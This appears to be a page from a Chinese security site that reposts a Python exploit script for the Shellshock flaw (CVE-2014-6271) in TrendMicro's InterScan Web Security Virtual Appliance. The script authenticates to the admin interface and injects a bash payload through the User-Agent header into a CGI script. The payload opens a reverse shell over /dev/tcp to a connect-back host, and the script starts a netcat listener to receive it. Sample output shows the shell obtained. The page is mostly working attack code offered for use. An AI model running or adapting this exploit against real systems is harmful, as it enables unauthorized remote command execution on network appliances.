首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (She
来源:https://www.myhackerhouse.com 作者:Fantastic 发布时间:2016-10-24  

#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import SimpleHTTPServer
import subprocess
import requests
import sys
import os

def spawn_listener():
 os.system("nc -l 8080")

def shellshock(ip,session,cbip):
 user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
 cookies = {'JSESSIONID': session}
 print "[-] exploiting shellshock CVE-2014-6271..."
 myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)

def login_http(ip,user,password):
 mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
 print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
 myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata) 
 session_cookie = myreq.history[0].cookies.get('JSESSIONID')
 print "[-] JSESSIONID = %s" % session_cookie
 return session_cookie

if __name__ == "__main__":
 print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
 if len(sys.argv) < 5:
  print "[-] use with <ip> <user> <pass> <connectback_ip>"
  sys.exit()
 newRef=os.fork()
     if newRef==0:
  spawn_listener()
     else:
  session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
  shellshock(sys.argv[1],session,sys.argv[4])


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle VM VirtualBox 4.3.28 -
·Deluge 1.3.13 - Denial Of Serv
·Linux Kernel 2.6.22 < 3.9 (x86
·WordPress Userpro Remote File
·FreePBX 10.13.66 - Remote Comm
·Panda Security PSEvents Privil
·Linux Kernel 2.6.22 < 3.9 - 'D
·Microsoft Windows x86 NDISTAPI
·Windows - NtLoadKeyEx Read Onl
·Network Scanner 4.0.0 - SEH Lo
·Windows Edge/IE - Isolated Pri
·WSearch service (windows) - pe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved